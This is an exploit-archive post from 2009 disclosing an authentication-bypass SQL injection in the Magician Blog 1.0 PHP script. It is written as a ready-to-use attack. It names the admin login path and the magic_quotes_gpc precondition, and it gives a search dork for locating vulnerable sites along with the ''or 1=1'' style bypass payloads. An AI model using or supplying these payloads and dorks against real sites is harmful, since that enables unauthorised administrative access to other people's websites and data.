[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Magician Blog <= 1.0 (Auth Bypass) SQL injection Vulnerability
# Published : 2009-07-27
# Author : Evil-Cod3r
# Previous Title : Magician Blog <= 1.0 (ids) Remote SQL Injection Vulnerability
# Next Title : SerWeb <= 2.1.0-dev1 2009-07-02 Multiple RFI Vulnerabilities
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
[??] ~ Note : Been Repoted The Programed
==============================================================================
[??] Magician Blog <= 1.0 (Auth Bypass) SQL injection Valunrability
==============================================================================
[??] Script: [ Magician v1.0 ]
[??] Language: [ PHP ]
[??] home: [ www.4smart.net ]
[??] Founder: [ Evil-Cod3r <IE7@Windowslive.com - o41@hotmail.Com> ]
[??] Gr44tz to: [ Recru1t Qabandi - Sniper Code - Mr.SaFa7 - The g0bL!N - S4S-T3rr0ist ]
[??] Dork: [ "Powered By 4smart" ]
[??] Price: [ $300 But i Scanned The Nulled !! ]
###########################################################################
You Need magic_quotes_gpc = off
===[ Exploit SQL ]===
[??] http://www.Site.com/path/admin
[??] Exploit :
First : 'or 1=1 or ' & or & 'or 1=1/*
Author: Evil-Cod3r <-
###########################################################################
# www.Syue.com [2009-07-27]